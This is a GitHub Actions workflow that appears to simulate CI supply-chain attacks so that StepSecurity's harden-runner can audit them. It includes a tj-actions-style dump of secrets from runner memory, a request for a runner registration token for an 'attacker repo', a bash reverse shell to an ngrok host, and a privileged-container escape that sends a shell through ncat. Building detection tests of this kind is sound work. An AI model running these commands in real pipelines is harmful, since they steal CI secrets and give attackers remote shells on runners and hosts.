name: Workflow for POCs
on:
  workflow_dispatch:

jobs:
  tj-actions-simulation:
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@rc
        with:
         egress-policy: audit
     
      - name: Checkout
        uses: actions/checkout@v4

      - name: Execute tj-action
        run: | 
          sudo python3 tj.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0
  pytorch-simulation:
    runs-on: ubuntu-latest
    steps:
    - uses: step-security/harden-runner@rc
      with:
         egress-policy: audit
    - name: Checkout
      uses: actions/checkout@v4
    - name: Generate a registration token for attacker repo
      run: |
          response=$(curl -X POST -H "Authorization: token github_pat_dummy_token" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token)
  reverse-shell: 
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@rc
        with:
          egress-policy: audit

      - name: Reverse shell
        run: |
          bash -c "bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17658 0>&1"
  privileged-conatiner:
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@rc
        with:
          egress-policy: audit

      - name: Dind escape
        run: |
          docker run --privileged --cap-add=ALL -v /:/host raesene/ncat:latest 0.tcp.us-cal-1.ngrok.io 17658 -e /bin/bash
